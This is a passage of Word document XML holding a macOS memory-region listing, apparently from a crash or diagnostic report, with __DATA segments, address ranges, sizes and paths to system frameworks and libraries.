    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9867000-00007fffd9891000 [  168K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/MetalPerformanceShaders.framework/Versions/A/MetalPerformanceShaders</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9891000-00007fffd9895000 [   16K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/MobileAsset.framework/Versions/A/MobileAsset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9895000-00007fffd98ca000 [  212K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/MobileDevice.framework/Versions/A/MobileDevice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd98ca000-00007fffd98cc000 [    8K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/MobileKeyBag.framework/Versions/A/MobileKeyBag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd98d0000-00007fffd98d2000 [    8K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/MultitouchSupport.framework/Versions/A/MultitouchSupport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9904000-00007fffd9906000 [    8K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/NetAuth.framework/Versions/A/NetAuth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd99e7000-00007fffd99e9000 [    8K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/OAuth.framework/Versions/A/OAuth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9afd000-00007fffd9b1b000 [  120K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/PerformanceAnalysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9b32000-00007fffd9b33000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/PhoneNumbers.framework/Versions/A/PhoneNumbers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9ca1000-00007fffd9cab000 [   40K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/PlugInKit.framework/Versions/A/PlugInKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffd9cc3000-00007fffd9ccc000 [   36K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/ProtectedCloudStorage.framework/Versions/A/ProtectedCloudStorage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9ccc000-00007fffd9cd3000 [   28K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/ProtocolBuffer.framework/Versions/A/ProtocolBuffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9cd3000-00007fffd9cd8000 [   20K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/QuickLookThumbnailing.framework/Versions/A/QuickLookThumbnailing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9cdb000-00007fffd9ce7000 [   48K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/RemoteViewServices.framework/Versions/A/RemoteViewServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9f71000-00007fffd9f72000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/SecCodeWrapper.framework/Versions/A/SecCodeWrapper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9f78000-00007fffd9f99000 [  132K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/ShareKit.framework/Versions/A/ShareKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9f99000-00007fffd9fc2000 [  164K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Sharing.framework/Versions/A/Sharing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9fc2000-00007fffd9fcd000 [   44K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Shortcut.framework/Versions/A/Shortcut</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd9fcd000-00007fffd9fec000 [  124K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/SkyLight.framework/Versions/A/SkyLight</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda067000-00007fffda069000 [    8K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/SpeechRecognitionCore.framework/Versions/A/SpeechRecognitionCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffda0fa000-00007fffda115000 [  108K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Suggestions.framework/Versions/A/Suggestions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda116000-00007fffda117000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftAppKit.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda119000-00007fffda145000 [  176K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftCore.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda147000-00007fffda148000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftCoreData.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda148000-00007fffda149000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftCoreGraphics.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda149000-00007fffda14a000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftCoreImage.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda14c000-00007fffda14d000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftDarwin.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda14d000-00007fffda14e000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftDispatch.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda14f000-00007fffda154000 [   20K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftFoundation.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda157000-00007fffda158000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftIOKit.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda15a000-00007fffda15b000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Swift/libswiftObjectiveC.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda161000-00007fffda17a000 [  100K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Symbolication.framework/Versions/A/Symbolication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda1cc000-00007fffda1da000 [   56K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/SystemAdministration.framework/Versions/A/SystemAdministration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffda25c000-00007fffda25d000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/TCC.framework/Versions/A/TCC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda28a000-00007fffda292000 [   32K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/TextureIO.framework/Versions/A/TextureIO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda2b4000-00007fffda2be000 [   40K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/ToneKit.framework/Versions/A/ToneKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda2be000-00007fffda2c4000 [   24K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/ToneLibrary.framework/Versions/A/ToneLibrary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda2c6000-00007fffda2c7000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/TrustEvaluationAgent.framework/Versions/A/TrustEvaluationAgent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda2c7000-00007fffda30c000 [  276K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/UIFoundation.framework/Versions/A/UIFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda46c000-00007fffda492000 [  152K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/ViewBridge.framework/Versions/A/ViewBridge</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda584000-00007fffda586000 [    8K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/XPCService.framework/Versions/A/XPCService</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda5c0000-00007fffda5c1000 [    4K] rw-/rwx SM=COW  ...brary/PrivateFrameworks/login.framework/Versions/A/Frameworks/loginsupport.framework/Versions/A/loginsupport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda5c9000-00007fffda5de000 [   84K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/vCard.framework/Versions/A/vCard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda5df000-00007fffda5e0000 [    4K] rw-/rwx SM=COW  /usr/lib/libCRFSuite.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda5e0000-00007fffda5e1000 [    4K] rw-/rwx SM=COW  /usr/lib/libChineseTokenizer.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffda5e1000-00007fffda5e4000 [   12K] rw-/rwx SM=COW  /usr/lib/libCoreStorage.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda5e4000-00007fffda5e5000 [    4K] rw-/rwx SM=COW  /usr/lib/libDiagnosticMessagesClient.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda5e5000-00007fffda60b000 [  152K] rw-/rwx SM=COW  /usr/lib/libFosl_dynamic.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda611000-00007fffda612000 [    4K] rw-/rwx SM=COW  /usr/lib/libMatch.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda612000-00007fffda613000 [    4K] rw-/rwx SM=COW  /usr/lib/libOpenScriptingUtil.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda613000-00007fffda614000 [    4K] rw-/rwx SM=COW  /usr/lib/libScreenReader.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda614000-00007fffda615000 [    4K] rw-/rwx SM=COW  /usr/lib/libSystem.B.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda61e000-00007fffda61f000 [    4K] rw-/rwx SM=COW  /usr/lib/libarchive.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda61f000-00007fffda620000 [    4K] rw-/rwx SM=COW  /usr/lib/libate.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda621000-00007fffda622000 [    4K] rw-/rwx SM=COW  /usr/lib/libauto.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda622000-00007fffda624000 [    8K] rw-/rwx SM=COW  /usr/lib/libbsm.0.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda624000-00007fffda625000 [    4K] rw-/rwx SM=COW  /usr/lib/libbz2.1.0.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda625000-00007fffda62d000 [   32K] rw-/rwx SM=COW  /usr/lib/libc++.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda62d000-00007fffda62f000 [    8K] rw-/rwx SM=COW  /usr/lib/libc++abi.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda62f000-00007fffda630000 [    4K] rw-/rwx SM=COW  /usr/lib/libcmph.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffda630000-00007fffda632000 [    8K] rw-/rwx SM=COW  /usr/lib/libcompression.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda632000-00007fffda633000 [    4K] rw-/rwx SM=COW  /usr/lib/libcoretls_cfhelpers.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda652000-00007fffda678000 [  152K] rw-/rwx SM=COW  /usr/lib/libcrypto.0.9.8.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda69b000-00007fffda69d000 [    8K] rw-/rwx SM=COW  /usr/lib/libcsfde.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda69d000-00007fffda6a5000 [   32K] rw-/rwx SM=COW  /usr/lib/libcups.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda6a5000-00007fffda6a8000 [   12K] rw-/rwx SM=COW  /usr/lib/libcurl.4.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda6a8000-00007fffda6a9000 [    4K] rw-/rwx SM=COW  /usr/lib/libdscsym.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda6b0000-00007fffda6b1000 [    4K] rw-/rwx SM=COW  /usr/lib/libenergytrace.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda6b3000-00007fffda6b4000 [    4K] rw-/rwx SM=COW  /usr/lib/libheimdal-asn1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda6b4000-00007fffda6b6000 [    8K] rw-/rwx SM=COW  /usr/lib/libiconv.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda6b6000-00007fffda6d7000 [  132K] rw-/rwx SM=COW  /usr/lib/libicucore.A.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda6d8000-00007fffda6d9000 [    4K] rw-/rwx SM=COW  /usr/lib/liblangid.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda6d9000-00007fffda6da000 [    4K] rw-/rwx SM=COW  /usr/lib/liblzma.5.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda6da000-00007fffda6db000 [    4K] rw-/rwx SM=COW  /usr/lib/libmarisa.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda6db000-00007fffda71b000 [  256K] rw-/rwx SM=COW  /usr/lib/libmecabra.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffda71f000-00007fffda729000 [   40K] rw-/rwx SM=COW  /usr/lib/libnetwork.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda729000-00007fffda7e6000 [  756K] rw-/rwx SM=COW  /usr/lib/libobjc.A.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda7e6000-00007fffda7e7000 [    4K] rw-/rwx SM=COW  /usr/lib/libodfde.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda7e7000-00007fffda7e8000 [    4K] rw-/rwx SM=COW  /usr/lib/libpam.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda7e8000-00007fffda7eb000 [   12K] rw-/rwx SM=COW  /usr/lib/libpcap.A.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda7f4000-00007fffda7f6000 [    8K] rw-/rwx SM=COW  /usr/lib/libresolv.9.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda7f6000-00007fffda7fe000 [   32K] rw-/rwx SM=COW  /usr/lib/libsandbox.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda7fe000-00007fffda7ff000 [    4K] rw-/rwx SM=COW  /usr/lib/libsasl2.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda7ff000-00007fffda800000 [    4K] rw-/rwx SM=COW  /usr/lib/libspindump.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda800000-00007fffda807000 [   28K] rw-/rwx SM=COW  /usr/lib/libsqlite3.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda80c000-00007fffda812000 [   24K] rw-/rwx SM=COW  /usr/lib/libssl.0.9.8.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda812000-00007fffda81a000 [   32K] rw-/rwx SM=COW  /usr/lib/libstdc++.6.0.9.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda826000-00007fffda827000 [    4K] rw-/rwx SM=COW  /usr/lib/libutil.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda827000-00007fffda828000 [    4K] rw-/rwx SM=COW  /usr/lib/libxar.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda828000-00007fffda829000 [    4K] rw-/rwx SM=COW  /usr/lib/libxcselect.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffda829000-00007fffda834000 [   44K] rw-/rwx SM=COW  /usr/lib/libxml2.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda834000-00007fffda835000 [    4K] rw-/rwx SM=COW  /usr/lib/libxslt.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda835000-00007fffda836000 [    4K] rw-/rwx SM=COW  /usr/lib/libz.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda839000-00007fffda83a000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libcache.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda83a000-00007fffda83c000 [    8K] rw-/rwx SM=COW  /usr/lib/system/libcommonCrypto.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda83c000-00007fffda83e000 [    8K] rw-/rwx SM=COW  /usr/lib/system/libcompiler_rt.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda83e000-00007fffda83f000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libcopyfile.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda83f000-00007fffda848000 [   36K] rw-/rwx SM=COW  /usr/lib/system/libcorecrypto.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda848000-00007fffda86b000 [  140K] rw-/rwx SM=COW  /usr/lib/system/libdispatch.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda86b000-00007fffda86c000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libdyld.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda86c000-00007fffda86d000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libkeymgr.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
